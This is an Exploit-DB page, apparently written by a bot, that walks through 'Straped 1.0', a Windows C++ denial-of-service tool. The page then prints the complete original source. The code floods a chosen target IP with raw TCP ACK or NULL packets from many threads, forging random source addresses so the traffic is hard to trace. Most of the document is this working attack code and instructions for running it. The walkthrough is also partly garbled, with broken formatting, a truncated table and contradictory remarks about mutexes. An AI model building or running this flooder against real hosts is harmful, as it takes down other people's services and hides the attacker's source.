By exploitdb papers bot•June 27, 2005•
papers
Stream / Raped (Windows) - Denial of Service Exploit Paper Walkthrough
Stream / Raped (Windows) - Denial of Service Exploit Paper Walkthrough
What this paper is
This paper details a Denial of Service (DoS) tool named "Straped 1.0" for Windows, ported by "LeVante". It's designed to overwhelm a target system by sending a large volume of crafted TCP packets. The tool utilizes raw sockets and multithreading to maximize its impact.
Simple technical breakdown
The program works by:
- Creating Raw Sockets: It bypasses the standard operating system networking stack to craft and send packets directly. This requires special privileges.
- Multithreading: It launches multiple threads, each responsible for sending packets independently, increasing the rate of packet transmission.
- Packet Crafting: Each thread constructs TCP packets with specific flags (ACK or NULL) and randomizes source IP addresses, ports, sequence numbers, and IP IDs.
- Spoofing: It attempts to spoof the source IP address to make it harder to trace the origin of the attack.
- Checksum Calculation: It correctly calculates the IP and TCP checksums for the crafted packets, which is crucial for them to be processed by network devices.
- Targeting: It sends these packets to a specified target IP address.
The goal is to exhaust the target's network resources or processing power, leading to a denial of service.
Complete code and payload walkthrough
Let's break down the provided C++ code for Straped 1.0.
/**
Straped 1.0 author: Marco Del Percio 20/05/2005
Remember: this is a mulithreaded program! MSVC++ compile with /MT.
Remember: This program requires raw socket support! You can't use it on Windows XP SP2 and
if you've done MS05-019 update you'll have to re-enable raw socket support! (If you still can)
see http://seclists.org/lists/nmap-hackers/2005/Apr-Jun/0001.htm for info about this.
levante at manicomio.org
*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
#include <ws2tcpip.h>
#include <string.h>
#include <process.h>
#pragma comment(lib, "ws2_32")
/* Global variables */
WSADATA wsa;
int delay = 1;
BOOL flag = TRUE;
HANDLE TIARRAY[256];
unsigned int target;
unsigned char attackType;- Header Comments: Provide author, date, compilation instructions (
/MTfor multithreaded), and crucial information about raw socket support limitations (Windows XP SP2 and MS05-019 update). #define WIN32_LEAN_AND_MEAN: A common Windows programming macro that reduces the size of the Win32 header files by excluding less commonly used APIs.- Includes: Standard C and Windows Sockets (Winsock) headers for network programming.
process.his for multithreading functions. #pragma comment(lib, "ws2_32"): Tells the linker to link against the Winsock 2 library.- Global Variables:
wsa:WSADATAstructure to hold Winsock initialization information.delay: An integer for the delay between sending packets (in milliseconds).flag: A boolean flag, likely used forsetsockopt.TIARRAY[256]: An array ofHANDLEs, used to store thread handles or synchronization objects.target: Anunsigned intto store the target IP address.attackType: Anunsigned charto store the TCP flags for the attack.
/* IP header structure */
struct ip_hdr {
unsigned char ip_hl:4, ip_v:4;
unsigned char ip_tos;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_off;
unsigned char ip_ttl;
unsigned char ip_p;
unsigned short ip_sum;
unsigned int ip_src;
unsigned int ip_dst;
};
/* TCP header structure */
struct tcp_hdr {
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_x2:4, th_off:4;
unsigned char th_flags;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
#define TOTAL_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr))
void flood(void *id); /* Thread flood function */struct ip_hdr: Defines the structure of an IPv4 header.ip_hl:4, ip_v:4: Header Length (4 bits) and Version (4 bits).ip_tos: Type of Service.ip_len: Total length of the IP packet.ip_id: Identification field.ip_off: Fragment offset.ip_ttl: Time To Live.ip_p: Protocol (e.g., 6 for TCP).ip_sum: Header checksum.ip_src: Source IP address.ip_dst: Destination IP address.
struct tcp_hdr: Defines the structure of a TCP header.th_sport: Source Port.th_dport: Destination Port.th_seq: Sequence Number.th_ack: Acknowledgment Number.th_x2:4, th_off:4: Reserved (4 bits) and Header Length (4 bits).th_flags: TCP flags (SYN, ACK, FIN, RST, PSH, URG).th_win: Window Size.th_sum: Checksum.th_urp: Urgent Pointer.
#define TOTAL_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr)): Defines a macro for the combined size of the IP and TCP headers. This is used for packet construction.void flood(void *id);: Declaration of the function that will be executed by each thread.
/* A common checksum function */
unsigned short checksum(unsigned short *buffer, int size) {
unsigned long cksum=0;
while(size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size)
cksum += *(unsigned char*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (unsigned short)(~cksum);
}checksumfunction: This function calculates the Internet checksum as described in RFC 1071. It's a standard algorithm used for IP and TCP/UDP headers.- It iterates through the buffer, summing 16-bit words.
- If there's an odd byte at the end, it's added.
- The sum is then folded (carry bits are added back to the lower bits) until it's a 16-bit value.
- Finally, it returns the one's complement of the sum.
int main(int argc, char *argv[]) {
int i = 0, nthreads = 1;
if( argc != 5) {
printf("\nStraped 1.0 Mix of stream/raped attack ported to Windows by LeVante^\n\nUse:\n%s <target IP> <delay(ms)> <tcp flags: ack|null> <number of threads>\n",argv[0]);
exit(1);
}
if(WSAStartup(MAKEWORD(2,1),&wsa)) {
fprintf(stderr, "\nError! WSAStartup failed!\n");
exit(1);
}
/* Target Ip and type of attack (tcp flags) are shared between threads since they're global */
target = inet_addr(argv[1]);
delay = atoi(argv[2]);
if(!strcmp(argv[3],"ack"))
attackType = 0x00000010; // TCP ACK flag
else if(!strcmp(argv[3],"null"))
attackType = 0x00000000; // No TCP flags set
else {
fprintf(stderr, "\nError! Tcp flags MUST be \"ack\" or \"null\".\n");
WSACleanup();
exit(1);
}
nthreads = atoi(argv[4]);
/* No more than 256 threads allowed */
if(nthreads <=0 || nthreads > 255) {
fprintf(stderr, "\nError! Number of threads must be between 1 and 256\n");
WSACleanup();
exit(1);
}
for(i=0;i<nthreads;i++) {
TIARRAY[i] = CreateMutex(NULL, FALSE, NULL); // Create mutexes for synchronization
/* The ID of each thread is the only argument passed to the thread function (as a void *) */
_beginthread( flood, 0, (void *) i); // Start the flood thread
}
Sleep(100); // Short delay to allow threads to start
printf("\nPacket flooding %s with %d threads...\n", argv[1], nthreads);
//just wait
WaitForMultipleObjects(nthreads, TIARRAY, TRUE, INFINITE); // Wait for all threads to complete (though they run indefinitely)
return 0;
}mainfunction: The entry point of the program.- Argument Check:
if( argc != 5): It expects exactly 5 command-line arguments: the program name, target IP, delay in milliseconds, TCP flags ("ack" or "null"), and the number of threads. If not, it prints usage instructions and exits. - Winsock Initialization:
WSAStartup(MAKEWORD(2,1),&wsa): Initializes the Winsock library. - Argument Parsing:
target = inet_addr(argv[1]): Converts the target IP address string to anunsigned int.delay = atoi(argv[2]): Converts the delay string to an integer.attackType: SetsattackTypebased onargv[3].0x10(binary00010000) is the ACK flag.0x00means no flags are set (often referred to as a "null" packet in this context, though technically it could be other combinations if not explicitly set).
- Thread Count Validation:
if(nthreads <=0 || nthreads > 255): Ensures the number of threads is within a reasonable range (1 to 255). - Thread Creation Loop:
TIARRAY[i] = CreateMutex(NULL, FALSE, NULL): Creates a mutex for each thread. While the code usesCreateMutexandWaitForSingleObjecton these mutexes, theWaitForSingleObjectis called inside thefloodfunction before the actual socket operations. This seems to be an attempt at thread synchronization, but the mutexes are not explicitly released or signaled in a way that would coordinate the start of the flooding across threads. TheWaitForMultipleObjectsat the end is intended to wait for thread completion, but since thefloodfunction has an infinite loop, this will never return._beginthread( flood, 0, (void *) i): Starts a new thread that executes thefloodfunction. The thread ID (i) is passed as an argument.
- Post-Thread Start:
Sleep(100): A small delay to allow threads to initialize.printf(...): Informs the user that flooding has started.WaitForMultipleObjects(...): This call will block indefinitely because thefloodfunction contains an infinitewhile(1)loop.
- Argument Check:
void flood(void *id) {
SOCKET sock;
int delay = 1; // Local delay variable, shadows global
unsigned char packet[4096]; // Buffer for the packet
struct sockaddr_in sin; // Socket address structure
unsigned short pseudo[32], seg_length = 20; // For pseudo-header calculation
unsigned char one,two,three,four, *ptr; // For spoofed IP generation
unsigned char spoofed_address[7]; // Buffer for spoofed IP string
struct ip_hdr *ip = (struct ip_hdr *) packet; // Pointer to IP header within packet buffer
struct tcp_hdr *tcp = (struct tcp_hdr *) (packet + 20); // Pointer to TCP header (after IP header)
WaitForSingleObject(TIARRAY[(int)id], INFINITE); // Wait on the mutex for this thread's ID.
// This is unusual. If the mutex is not signaled by another thread,
// this will block indefinitely. Given the main loop creates mutexes
// but doesn't signal them, this might be intended for a different
// synchronization pattern or is a remnant. However, it's called *before*
// socket creation, so it might prevent threads from proceeding if not handled.
// In this specific code, since the mutexes are never signaled, this line
// would cause each thread to block here if the mutex was initially locked.
// However, CreateMutex creates an initially signaled mutex. So this call
// immediately returns. It's effectively a no-op in this context.
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) { // Create a raw socket
fprintf(stderr, "\nThread with ID %d was unable to open socket\n", (int)id);
_endthread(); // Exit thread if socket creation fails
}
sin.sin_family = AF_INET;
sin.sin_port = htons(135); // Initial port, will be randomized later
sin.sin_addr.s_addr = target; // Set destination IP
memset(packet, 0, 4096); // Zero out the packet buffer
// Initial IP Header setup
ip->ip_hl = 5; // Header length is 5 dwords (20 bytes)
ip->ip_v = 4; // IPv4
ip->ip_tos = 0; // Type of Service
ip->ip_len = htons(TOTAL_LEN); // Total packet length (IP + TCP headers)
ip->ip_id = htons((USHORT)rand()); // Random IP ID
ip->ip_off = 0; // No fragmentation
ip->ip_ttl = 128; // Time To Live
ip->ip_p = 6; // Protocol: TCP
ip->ip_sum = 0; // Checksum will be calculated later
ip->ip_src = target; // Source IP (will be spoofed later)
ip->ip_dst = sin.sin_addr.s_addr; // Destination IP
// Initial TCP Header setup
tcp->th_sport = htons((USHORT)rand()); // Random source port
tcp->th_dport = htons((USHORT)rand()); // Random destination port
tcp->th_seq = htonl(rand()); // Random sequence number
tcp->th_ack = htonl(0); // Acknowledgment number (not used for SYN/ACK)
tcp->th_x2 = 0; // Reserved
tcp->th_off = 5; // Data offset (header length in 32-bit words, 5 * 4 = 20 bytes)
tcp->th_flags = attackType; // Set by command line argument (ACK or NULL)
tcp->th_win = htons(16384); // Window size
tcp->th_sum = 0; // Checksum will be calculated later
tcp->th_urp = 0; // Urgent Pointer
ip->ip_sum = checksum((unsigned short *) packet, 20); // Calculate IP header checksum
ptr = (unsigned char *)pseudo; // Pointer for pseudo-header construction
/* These passages were NOT coded by me. They're from Sahir Hidayatullah. These statements are based on hard coded offsets of the various fields from the start of the datagram */
// This block calculates the TCP checksum. The TCP checksum requires a "pseudo-header"
// which includes parts of the IP header (source/dest IP, protocol) and the TCP header.
// The code copies relevant parts into the 'pseudo' buffer.
memset(pseudo,0,32); // Zero out the pseudo-header buffer
memcpy(ptr,packet+20,20); // Copy the TCP header (20 bytes) into pseudo-header buffer
memcpy((ptr+20),packet+12,4); // Copy source IP from IP header (offset 12)
memcpy((ptr+24),packet+16,4); // Copy destination IP from IP header (offset 16)
memcpy((ptr+29),packet+9,1); // Copy protocol field (TCP is 6) from IP header (offset 9)
memset((ptr+31),20,1); // Set the TCP segment length (20 bytes) at offset 31 (after protocol)
tcp->th_sum = checksum(pseudo, 32); // Calculate TCP checksum using the pseudo-header
// Enable IP header inclusion in the socket. This is essential for raw sockets.
if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) < 0) {
fprintf(stderr, "\nError! Thread with ID %d was unable to set IP_HDRINCL option\n", (int)id);
closesocket(sock);
_endthread();
}
// Main flooding loop
while(1){
/* Each cycle generate a random source IP address, a random source/destination port, a random sequence number and a random IP id
then recalculate checksum both for IP and TCP and finally sends out the packet */
ptr = NULL; // Reset pointer
sin.sin_port = htons((USHORT)rand()); // Randomize destination port for the sockaddr_in structure
// Generate a random spoofed IP address
one = rand() % 256;
two = rand() % 256;
three = rand() % 256;
four = rand() % 256;
sprintf(spoofed_address,"%d.%d.%d.%d\0",one,two,three,four); // Format as string
ip->ip_src = inet_addr(spoofed_address); // Set the source IP in the IP header
ip->ip_id = htons((USHORT)rand()); // Randomize IP ID
ip->ip_sum = 0; // Reset IP checksum
ip->ip_sum = checksum((unsigned short *) packet, 20); // Recalculate IP checksum
tcp->th_sport = htons((USHORT)rand()); // Randomize source port in TCP header
tcp->th_dport = htons((USHORT)rand()); // Randomize destination port in TCP header
tcp->th_seq = htonl(rand()); // Randomize sequence number
tcp->th_sum=0; // Reset TCP checksum
/* Same passages for re-calculating pseudo-header. */
ptr = (unsigned char *)pseudo;
memset(pseudo,0,32);
memcpy(ptr,packet+20,20); // Copy TCP header
memcpy((ptr+20),packet+12,4); // Copy source IP
memcpy((ptr+24),packet+16,4); // Copy destination IP
memcpy((ptr+29),packet+9,1); // Copy protocol
memset((ptr+31),20,1); // Set TCP segment length
tcp->th_sum = checksum(pseudo, 32); // Recalculate TCP checksum
/* Sends out the datagram. 40 bytes is the sum of IP and TCP header length */
if(sendto(sock,packet,40,0,(struct sockaddr *) &sin, sizeof(sin)) < 0) // Send the packet
printf ("Thread with ID %d. Error while sending the packet: %d\n", (int)id, WSAGetLastError()); // Print error if send fails
if(delay) // If delay is set (non-zero)
Sleep(delay); // Wait for the specified delay
}
}
// milw0rm.com [2005-06-27]floodfunction: This is the core function executed by each thread.WaitForSingleObject(TIARRAY[(int)id], INFINITE);: As noted in the comments, this line is unusual.CreateMutexcreates a mutex in the signaled state by default. Therefore,WaitForSingleObjectwill immediately return. It doesn't seem to provide any meaningful synchronization in this specific implementation.- Socket Creation:
socket(AF_INET, SOCK_RAW, IPPROTO_IP): Creates a raw socket. This requires administrator privileges.IPPROTO_IPmeans we'll be handling IP packets ourselves. sockaddr_inSetup: Initializes thesockaddr_instructure with the target IP address. The port is initially set to 135 but will be randomized.- Packet Buffer Initialization:
memset(packet, 0, 4096): Clears the packet buffer. - Initial IP Header Construction: Sets up the basic fields of the IP header (version, header length, protocol, TTL, destination IP). Source IP is initially set to the target but will be spoofed.
- Initial TCP Header Construction: Sets up basic TCP header fields (source/destination ports, sequence number, flags, window size). The
attackType(ACK or NULL) is applied here. - Initial Checksum Calculation: Calculates the IP header checksum and the TCP checksum using the pseudo-header.
setsockopt(sock, IPPROTO_IP, IP_HDRINCL, ...): This is critical. It tells the Winsock API that the application will provide the IP header itself, and Winsock should not prepend its own.- Infinite Flooding Loop (
while(1)):- Randomization: Inside the loop, the following are randomized for each packet:
- Source IP address: A random IP is generated and set in
ip->ip_src. - IP ID:
ip->ip_idis randomized. - Source Port:
tcp->th_sportis randomized. - Destination Port:
tcp->th_dportis randomized. - Sequence Number:
tcp->th_seqis randomized.
- Source IP address: A random IP is generated and set in
- Recalculation: After randomizing fields, the IP and TCP checksums are recalculated.
sendto(...): The crafted packet (40 bytes, consisting of the IP and TCP headers) is sent to the target IP address.- Error Reporting: If
sendtofails, an error message is printed. - Delay:
Sleep(delay): If a non-zero delay was specified, the thread pauses for that duration.
- Randomization: Inside the loop, the following are randomized for each packet:
Mapping of Code Fragments to Practical Purpose:
| Code Fragment/Block | Practical Purpose
Original Exploit-DB Content (Verbatim)
/**
Straped 1.0 author: Marco Del Percio 20/05/2005
Remember: this is a mulithreaded program! MSVC++ compile with /MT.
Remember: This program requires raw socket support! You can't use it on Windows XP SP2 and
if you've done MS05-019 update you'll have to re-enable raw socket support! (If you still can)
see http://seclists.org/lists/nmap-hackers/2005/Apr-Jun/0001.htm for info about this.
levante at manicomio.org
*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
#include <ws2tcpip.h>
#include <string.h>
#include <process.h>
#pragma comment(lib, "ws2_32")
/* Global variables */
WSADATA wsa;
int delay = 1;
BOOL flag = TRUE;
HANDLE TIARRAY[256];
unsigned int target;
unsigned char attackType;
/* IP header structure */
struct ip_hdr {
unsigned char ip_hl:4, ip_v:4;
unsigned char ip_tos;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_off;
unsigned char ip_ttl;
unsigned char ip_p;
unsigned short ip_sum;
unsigned int ip_src;
unsigned int ip_dst;
};
/* TCP header structure */
struct tcp_hdr {
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_x2:4, th_off:4;
unsigned char th_flags;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
#define TOTAL_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr))
void flood(void *id); /* Thread flood function */
/* A common checksum function */
unsigned short checksum(unsigned short *buffer, int size) {
unsigned long cksum=0;
while(size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size)
cksum += *(unsigned char*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (unsigned short)(~cksum);
}
int main(int argc, char *argv[]) {
int i = 0, nthreads = 1;
if( argc != 5) {
printf("\nStraped 1.0 Mix of stream/raped attack ported to Windows by LeVante^\n\nUse:\n%s <target IP> <delay(ms)> <tcp flags: ack|null> <number of threads>\n",argv[0]);
exit(1);
}
if(WSAStartup(MAKEWORD(2,1),&wsa)) {
fprintf(stderr, "\nError! WSAStartup failed!\n");
exit(1);
}
/* Target Ip and type of attack (tcp flags) are shared between threads since they're global */
target = inet_addr(argv[1]);
delay = atoi(argv[2]);
if(!strcmp(argv[3],"ack"))
attackType = 0x00000010;
else if(!strcmp(argv[3],"null"))
attackType = 0x00000000;
else {
fprintf(stderr, "\nError! Tcp flags MUST be \"ack\" or \"null\".\n");
WSACleanup();
exit(1);
}
nthreads = atoi(argv[4]);
/* No more than 256 threads allowed */
if(nthreads <=0 || nthreads > 255) {
fprintf(stderr, "\nError! Number of threads must be between 1 and 256\n");
WSACleanup();
exit(1);
}
for(i=0;i<nthreads;i++) {
TIARRAY[i] = CreateMutex(NULL, FALSE, NULL);
/* The ID of each thread is the only argument passed to the thread function (as a void *) */
_beginthread( flood, 0, (void *) i);
}
Sleep(100);
printf("\nPacket flooding %s with %d threads...\n", argv[1], nthreads);
//just wait
WaitForMultipleObjects(nthreads, TIARRAY, TRUE, INFINITE);
return 0;
}
void flood(void *id) {
SOCKET sock;
int delay = 1;
unsigned char packet[4096];
struct sockaddr_in sin;
unsigned short pseudo[32], seg_length = 20;
unsigned char one,two,three,four, *ptr;
unsigned char spoofed_address[7];
struct ip_hdr *ip = (struct ip_hdr *) packet;
struct tcp_hdr *tcp = (struct tcp_hdr *) (packet + 20);
WaitForSingleObject(TIARRAY[(int)id], INFINITE);
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
fprintf(stderr, "\nThread with ID %d was unable to open socket\n", (int)id);
_endthread();
}
sin.sin_family = AF_INET;
sin.sin_port = htons(135); //this will be changed with a random port
sin.sin_addr.s_addr = target;
memset(packet, 0, 4096);
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_len = htons(TOTAL_LEN);
ip->ip_id = htons((USHORT)rand());
ip->ip_off = 0;
ip->ip_ttl = 128;
ip->ip_p = 6;
ip->ip_sum = 0;
ip->ip_src = target;
ip->ip_dst = sin.sin_addr.s_addr;
tcp->th_sport = htons((USHORT)rand()); /* Random source/destination port */
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_ack = htonl(0);
tcp->th_x2 = 0;
tcp->th_off = 5;
tcp->th_flags = attackType; /* either ack or no flags set */
tcp->th_win = htons(16384);
tcp->th_sum = 0;
tcp->th_urp = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
ptr = (unsigned char *)pseudo;
/* These passages were NOT coded by me. They're from Sahir Hidayatullah. These statements are based on hard coded offsets of the various fields from the start of the datagram */
memset(pseudo,0,32); // Zero out the pseudo-header
memcpy(ptr,packet+20,20); // Copy in the tcp header
memcpy((ptr+20),packet+12,4); // Source IP
memcpy((ptr+24),packet+16,4); // Dest IP
memcpy((ptr+29),packet+9,1); // 8bit zero + Protocol
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);
if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) < 0) {
fprintf(stderr, "\nError! Thread with ID %d was unable to set IP_HDRINCL option\n", (int)id);
closesocket(sock);
_endthread();
}
while(1){
/* Each cycle generate a random source IP address, a random source/destination port, a random sequence number and a random IP id
then recalculate checksum both for IP and TCP and finally sends out the packet */
ptr = NULL;
sin.sin_port = htons((USHORT)rand());
one = rand() % 256;
two = rand() % 256;
three = rand() % 256;
four = rand() % 256;
sprintf(spoofed_address,"%d.%d.%d.%d\0",one,two,three,four);
ip->ip_src = inet_addr(spoofed_address);
ip->ip_id = htons((USHORT)rand());
ip->ip_sum = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
tcp->th_sport = htons((USHORT)rand());
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_sum=0;
/* Same passages for re-calculating pseudo-header. */
ptr = (unsigned char *)pseudo;
memset(pseudo,0,32);
memcpy(ptr,packet+20,20);
memcpy((ptr+20),packet+12,4);
memcpy((ptr+24),packet+16,4);
memcpy((ptr+29),packet+9,1);
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);
/* Sends out the datagram. 40 bytes is the sum of IP and TCP header length */
if(sendto(sock,packet,40,0,(struct sockaddr *) &sin, sizeof(sin)) < 0)
printf ("Thread with ID %d. Error while sending the packet: %d\n", (int)id, WSAGetLastError());
if(delay)
Sleep(delay);
}
}
// milw0rm.com [2005-06-27]